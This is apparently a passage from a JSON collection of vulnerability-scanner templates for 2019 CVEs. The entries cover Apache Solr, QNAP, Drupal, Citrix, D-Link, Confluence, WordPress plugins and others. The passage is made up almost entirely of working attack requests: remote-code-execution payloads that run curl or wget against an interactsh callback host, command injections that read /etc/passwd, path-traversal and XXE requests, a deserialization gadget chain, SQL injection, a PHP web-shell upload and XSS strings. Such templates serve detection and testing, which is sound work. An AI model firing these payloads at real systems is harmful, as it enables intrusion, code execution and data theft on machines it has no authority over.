/solr/{{core}}/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27curl%20{{interactsh-url}}%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1\nHost: {{Hostname}}\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"core","group":1,"regex":["\"name\"\\:\"(.*?)\""],"internal":true}]}]},{"id":"CVE-2019-7192","info":{"name":"QNAP QTS and Photo Station 6.0.3 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /photo/p/api/album.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\na=setSlideshow&f=qsamplealbum\n","GET /photo/slideshow.php?album={{album_id}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","POST /photo/p/api/video.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nalbum={{album_id}}&a=caption&ac={{access_code}}&f=UMGObv&filename=.%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body_3","regex":["admin:.*:0:0:"]},{"type":"word","part":"header_3","words":["video/subtitle"]},{"type":"status","part":"header_3","status":[200]}],"extractors":[{"type":"regex","name":"album_id","part":"body_1","group":1,"regex":["<output>([a-zA-Z]+)<\\/output>"],"internal":true},{"type":"regex","name":"access_code","part":"body_2","group":1,"regex":["encodeURIComponent\\('([A-Za-z0-9]+)'\\)"],"internal":true}]}]},{"id":"CVE-2019-14696","info":{"name":"Open-School 3.0/Community Edition 2.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?r=students/guardians/create&id=1%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-3396","info":{"name":"Atlassian Confluence Server - Path Traversal","severity":"critical"},"requests":[{"raw":["POST /rest/tinymce/1/macro/preview HTTP/1.1\nHost: {{Hostname}}\nReferer: {{Hostname}}\n\n{\"contentId\":\"786457\",\"macro\":{\"name\":\"widget\",\"body\":\"\",\"params\":{\"url\":\"https://www.viddler.com/v/23464dc5\",\"width\":\"1000\",\"height\":\"1000\",\"_template\":\"../web.xml\"}}}\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["<param-name>contextConfigLocation</param-name>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-3403","info":{"name":"Jira - Incorrect Authorization","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/rest/api/2/user/picker?query="],"matchers-condition":"and","matchers":[{"type":"word","words":["\"users\":","\"total\":","\"header\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"word","part":"body","negative":true,"words":["Showing 0 of 0 matching users"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-3912","info":{"name":"LabKey Server Community Edition <18.3.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/labkey/__r1/login-login.view?returnUrl=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2019-2616","info":{"name":"Oracle Business Intelligence/XML Publisher - XML External Entity Injection","severity":"high"},"requests":[{"raw":["POST /xmlpserver/ReportTemplateService.xls HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nContent-Type: text/xml; charset=UTF-8\n\n<!DOCTYPE soap:envelope PUBLIC \"-//B/A/EN\" \"http://{{interactsh-url}}\">\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-11013","info":{"name":"Nimble Streamer <=3.5.4-9 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/demo/file/../../../../../../../../etc/passwd%00filename.mp4/chunk.m3u8?nimblesessionid=1484448"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-2578","info":{"name":"Oracle Fusion Middleware WebCenter Sites 12.2.1.3.0  - Broken Access Control","severity":"high"},"requests":[{"raw":["GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1\nHost: {{Hostname}}\n","GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/Slots HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"body","regex":["<script[\\d\\D]*<throwexception/>"]}]}]},{"id":"CVE-2019-15713","info":{"name":"WordPress My Calendar <= 3.1.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?rsd=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-6340","info":{"name":"Drupal - Remote Code Execution","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/node/1?_format=hal_json"],"body":"{ \"link\": [ { \"value\": \"link\", \"options\": \"O:24:\\\"GuzzleHttp\\\\Psr7\\\\FnStream\\\":2:{s:33:\\\"\\u0000GuzzleHttp\\\\Psr7\\\\FnStream\\u0000methods\\\";a:1:{s:5:\\\"close\\\";a:2:{i:0;O:23:\\\"GuzzleHttp\\\\HandlerStack\\\":3:{s:32:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000handler\\\";s:2:\\\"id\\\";s:30:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000stack\\\";a:1:{i:0;a:1:{i:0;s:6:\\\"system\\\";}}s:31:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000cached\\\";b:0;}i:1;s:7:\\\"resolve\\\";}}s:9:\\\"_fn_close\\\";a:2:{i:0;r:4;i:1;s:7:\\\"resolve\\\";}}\" } ], \"_links\": { \"type\": { \"href\": \"http://192.168.1.25/drupal-8.6.9/rest/type/shortcut/default\" } } }","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid=","gid=","groups="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-8451","info":{"name":"Jira <8.4.0 - Server-Side Request Forgery","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/plugins/servlet/gadgets/makeRequest"],"body":"url=https://{{Host}}:443@{{interactsh-url}}\n","headers":{"X-Atlassian-Token":"no-check","Content-Type":"application/x-www-form-urlencoded"},"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-12276","info":{"name":"GrandNode 4.40 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/LetsEncrypt/Index?fileName=/etc/passwd"],"headers":{"Connection":"close"},"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16525","info":{"name":"WordPress Checklist <1.1.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/checklist/images/checklist-icon.php?&fill=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-17418","info":{"name":"MetInfo 7.0.0 beta - SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/?n=language&c=language_general&a=doSearchParameter&editor=cn&word=search&appno=0+union+select+98989*443131,1--+&site=admin"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["43865094559"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16057","info":{"name":"D-Link DNS-320 -  Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/login_mgr.cgi?C1=ON&cmd=login&f_type=1&f_username=admin&port=80%7Cpwd%26id&pre_pwd=1&pwd=%20&ssl=1&ssl_port=1&username="],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains_all(body, \"uid=\", \"gid=\", \"pwd&id\")"],"condition":"and"}]}]},{"id":"CVE-2019-2767","info":{"name":"Oracle Business Intelligence Publisher - XML External Entity Injection","severity":"high"},"requests":[{"raw":["GET /xmlpserver/convert?xml=<%3fxml+version%3d\"1.0\"+%3f><!DOCTYPE+r+[<!ELEMENT+r+ANY+><!ENTITY+%25+sp+SYSTEM+\"http%3a//{{interactsh-url}}/xxe.xml\">%25sp%3b%25param1%3b]>&_xf=Excel&_xl=123&template=123 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-20183","info":{"name":"Simple Employee Records System 1.0 - Unrestricted File Upload","severity":"high"},"requests":[{"raw":["POST /dashboard/uploadID.php HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/javascript, */*; q=0.01\nX-Requested-With: XMLHttpRequest\nContent-Type: multipart/form-data; boundary=---------------------------5825462663702204104870787337\n\n-----------------------------5825462663702204104870787337\nContent-Disposition: form-data; name=\"employee_ID\"; filename=\"poc.php\"\nContent-Type: image/png\n\n<?php\necho md5('CVE-2019-20183');\nunlink(__FILE__);\n?>\n-----------------------------5825462663702204104870787337--\n","GET /uploads/employees_ids/{{endpoint}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body_2","words":["1ad0d710225c472cb7396b3c1d97e4dd"]}],"extractors":[{"type":"regex","name":"endpoint","regex":["(?:[a-zA-Z0-9+\\/])*_poc.php"],"internal":true,"part":"body"}]}]},{"id":"CVE-2019-1821","info":{"name":"Cisco Prime Infrastructure and Cisco Evolved Programmable Network Manager - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /servlet/UploadServlet HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nPrimary-IP: 127.0.0.1\nFilename: test.tar\nFilesize: 10240\nCompressed-Archive: false\nDestination-Dir: tftpRoot\nFilecount: 1\nContent-Length: 269\nContent-Type: multipart/form-data; boundary=871a4a346a547cf05cb83f57b9ebcb83\n\n--871a4a346a547cf05cb83f57b9ebcb83\nContent-Disposition: form-data; name=\"files\"; filename=\"test.tar\"\n\n../../opt/CSCOlumos/tomcat/webapps/ROOT/test.txt0000644000000000000000000000000400000000000017431 0ustar  00000000000000{{randstr}}\n--871a4a346a547cf05cb83f57b9ebcb83--\n","GET /test.txt HTTP/1.1\nHost: {{Host}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains((body_2), '{{randstr}}')"],"condition":"and"}]}]},{"id":"CVE-2019-12985","info":{"name":"Citrix SD-WAN Center - Remote Command Injection","severity":"critical"},"requests":[{"raw":["GET /login HTTP/1.1\nHost: {{Hostname}}\n","POST /Collector/diagnostics/ping HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nipAddress=%60/bin/wget+http://{{interactsh-url}}%60\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, \"<title>Citrix SD-WAN</title>\")"]},{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-15859","info":{"name":"Socomec DIRIS A-40 Devices Password Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/password.jsn"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/json"]},{"type":"word","part":"body","words":["username","password"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-0193","info":{"name":"Apache Solr DataImportHandler <8.2.0 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /solr/admin/cores?wt=json HTTP/1.1\nHost: {{Hostname}}\nAccept-Language: en\nConnection: close\n","POST /solr/{{core}}/dataimport?indent=on&wt=json HTTP/1.1\nHost: {{Hostname}}\nContent-type: application/x-www-form-urlencoded\nX-Requested-With: XMLHttpRequest\n\ncommand=full-import&verbose=false&clean=false&commit=true&debug=true&core=test&dataConfig=%3CdataConfig%3E%0A++%3CdataSource+type%3D%22URLDataSource%22%2F%3E%0A++%3Cscript%3E%3C!%5BCDATA%5B%0A++++++++++function+poc()%7B+java.lang.Runtime.getRuntime().exec(%22curl%20{{interactsh-url}}%22)%3B%0A++++++++++%7D%0A++%5D%5D%3E%3C%2Fscript%3E%0A++%3Cdocument%3E%0A++++%3Centity+name%3D%22stackoverflow%22%0A++++++++++++url%3D%22https%3A%2F%2Fstackoverflow.com%2Ffeeds%2Ftag%2Fsolr%22%0A++++++++++++processor%3D%22XPathEntityProcessor%22%0A++++++++++++forEach%3D%22%2Ffeed%22%0A++++++++++++transformer%3D%22script%3Apoc%22+%2F%3E%0A++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&name=dataimport\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}],"extractors":[{"type":"regex","name":"core","group":1,"regex":["\"name\"\\:\"(.*?)\""],"internal":true}]}]},{"id":"CVE-2019-16662","info":{"name":"rConfig 3.9.2 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-3799","info":{"name":"Spring Cloud Config Server - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/test/pathtraversal/master/..%252f..%252f..%252f..%252f../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-17270","info":{"name":"Yachtcontrol Webapplication 1.0 - Remote Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/pages/systemcall.php?command=cat%20/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-1653","info":{"name":"Cisco Small Business WAN VPN Routers - Sensitive Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/config.exp"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["sysconfig"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-20224","info":{"name":"Pandora FMS 7.0NG - Remote Command Injection","severity":"high"},"requests":[{"raw":["POST /pandora_console/index.php?login=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnick=admin&pass=admin&login_button=Login\n","POST /pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view&pure=0 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ndate=0&time=0&period=0&interval_length=0&chart_type=netflow_area&max_aggregates=1&address_resolution=0&name=0&assign_group=0&filter_type=0&filter_id=0&filter_selected=0&ip_dst=0&ip_src=%22%3Bcurl+{{interactsh-url}}+%23&draw_button=Draw\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","name":"http","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16097","info":{"name":"Harbor <=1.82.0 - Privilege Escalation","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/api/users"],"body":"{\"username\": \"testpoc\", \"has_admin_role\": true, \"password\": \"TestPoc!\", \"email\": \"testpoc@interact.sh\", \"realname\": \"poc\"}\n","headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"response","words":["username has already been used","Location: /api/users/"],"condition":"or"},{"type":"status","status":[201,409],"condition":"or"}]}]},{"id":"CVE-2019-13392","info":{"name":"MindPalette NateMail 3.0.15 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /NateMail.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nrecipient=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2019-8390","info":{"name":"qdPM 9.1 - Cross-site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlogin%5B_csrf_token%5D={{csrf}}&login%5Bemail%5D={{username}}&login%5Bpassword%5D={{password}}&http_referer=\n","POST /index.php/users HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsearch[keywords]=e\"><script>alert(document.domain)</script>&search_by_extrafields[]=9\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","alert alert-info alert-search-result"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name=\"login\\[_csrf_token\\]\" value=\"(.*?)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2019-19908","info":{"name":"phpMyChat-Plus 1.98 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plus/pass_reset.php?L=english&pmc_username=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["username = \"</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-19368","info":{"name":"Rumpus FTP Web File Manager 8.2.9.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Login?!'><sVg/OnLoAD=alert`1337`//"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=''><sVg/OnLoAD=alert`1337`//'>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-6715","info":{"name":"W3 Total Cache 0.9.2.6-0.9.3 - Unauthenticated File Read / Directory Traversal","severity":"high"},"requests":[{"raw":["PUT /wp-content/plugins/w3-total-cache/pub/sns.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n{\"Type\":\"SubscriptionConfirmation\",\"Message\":\"\",\"SubscribeURL\":\"https://rfi.nessus.org/rfi.txt\"}\n"],"matchers":[{"type":"word","part":"body","words":["TmVzc3VzQ29kZUV4ZWNUZXN0"]}]}]},{"id":"CVE-2019-18371","info":{"name":"Xiaomi Mi WiFi R3G Routers - Local file Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api-third-party/download/extdisks../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-20210","info":{"name":"WordPress CTHthemes - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?search_term=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&location_search=&nearby=off&address_lat=&address_lng=&distance=10&lcats%5B%5D="],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>","/wp-content/themes/citybook"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-15501","info":{"name":"L-Soft LISTSERV <16.5-2018a - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/scripts/wa.exe?OK=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>","LISTSERV"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-14530","info":{"name":"OpenEMR <5.0.2 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /interface/main/main_screen.php?auth=login&site=default HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_login_session_management=1&authProvider=Default&authUser={{username}}&clearPass={{password}}&languageChoice=1\n","GET /custom/ajax_download.php?fileName=../../../../../../../../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["filename=passwd"]},{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-14251","info":{"name":"T24 Web Server - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/WealthT24/GetImage?docDownloadPath=/etc/passwd","{{BaseURL}}/WealthT24/GetImage?docDownloadPath=c:/windows/win.ini"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:","for 16-bit app support"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-7315","info":{"name":"Genie Access WIP3BVAF IP Camera - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-10717","info":{"name":"BlogEngine.NET 3.3.7.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/filemanager?path=%2F..%2f..%2fContent"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","regex":["~/App_Data/files/../../([a-zA-Z0-9\\.\\-]+)/([a-z0-9]+)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-1898","info":{"name":"Cisco RV110W RV130W RV215W Router - Information leakage","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/_syslog.txt"],"headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(to_lower(body), \"ethernet\") && contains(to_lower(body), \"connection\")","contains(header, \"application/octet-stream\")"],"condition":"and"}]}]},{"id":"CVE-2019-19781","info":{"name":"Citrix ADC and Gateway - Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/vpn/../vpns/cfg/smb.conf"],"matchers-condition":"and","matchers":[{"type":"word","words":["[global]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-9726","info":{"name":"Homematic CCU3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.%00./.%00./etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","bin:.*:0:0:"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-1010290","info":{"name":"Babel - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/modules/babel/redirect.php?newurl=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2019-12986","info":{"name":"Citrix SD-WAN Center - Remote Command Injection","severity":"critical"},"requests":[{"raw":["GET /login HTTP/1.1\nHost: {{Hostname}}\n","POST /Collector/diagnostics/trace_route HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nipAddress=%60/bin/wget+http://{{interactsh-url}}%60\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, \"<title>Citrix SD-WAN</title>\")"]},{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-8903","info":{"name":"Totaljs <3.2.3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/var/www/html/index.html"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["apache2.conf"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-11370","info":{"name":"Carel pCOWeb <B1.2.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /config/pw_snmp_done.html HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n%3Fscript%3Asetdb%28%27snmp%27%2C%27syscontact%27%29=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\n","GET /config/pw_snmp.html HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_2, \"text/html\")","status_code_2 == 200","contains(body_2, 'value=\\\"\\\"><script>alert(document.domain)</script>\\\"></td>')"],"condition":"and"}]}]},{"id":"CVE-2019-15043","info":{"name":"Grafana - Improper Access Control","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/api/snapshots"],"body":"{\"dashboard\": {\"name\":\"{{payload}}\"}}","headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"deleteUrl\":","\"deleteKey\":","\"key\":","\"url\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-10098","info":{"name":"Apache HTTP server v2.4.0 to v2.4.39 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/http%3A%2F%2Fwww.interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2019-16920","info":{"name":"D-Link Routers - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /apply_sec.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{BaseURL}}\n\nhtml_response_page=login_pic.asp&login_name=YWRtaW4%3D&log_pass=&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=62384\n","POST /apply_sec.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{BaseURL}}/login_pic.asp\nCookie: uid=1234123\n\nhtml_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a{{url_encode('cat /etc/passwd')}}\n","POST /apply_sec.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{BaseURL}}/login_pic.asp\nCookie: uid=1234123\n\nhtml_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a{{url_encode('type C:\\\\Windows\\\\win.ini')}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","\\[(font|extension|file)s\\]"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-17574","info":{"name":"Popup-Maker < 1.8.12 - Broken Authentication","severity":"critical"},"requests":[{"raw":["GET /?pum_action=tools_page_tab_system_info HTTP/1.1\nHost: {{Hostname}}\n","POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\npopmake_action=popup_sysinfo&popmake-sysinfo=CVE-2019-17574\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["Popup Maker Configuration","Webserver Configuration"],"condition":"and"},{"type":"word","part":"body_2","words":["CVE-2019-17574"]}]}]},{"id":"CVE-2019-5434","info":{"name":"Revive Adserver 4.2 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /adxmlrpc.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nAccept-Encoding: gzip\n\n<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?> <methodCall> <methodName>openads.spc</methodName> <params> <param> <value> <struct> <member> <name>remote_addr</name> <value>8.8.8.8</value> </member> <member> <name>cookies</name> <value> <array> </array> </value> </member> </struct> </value> </param> 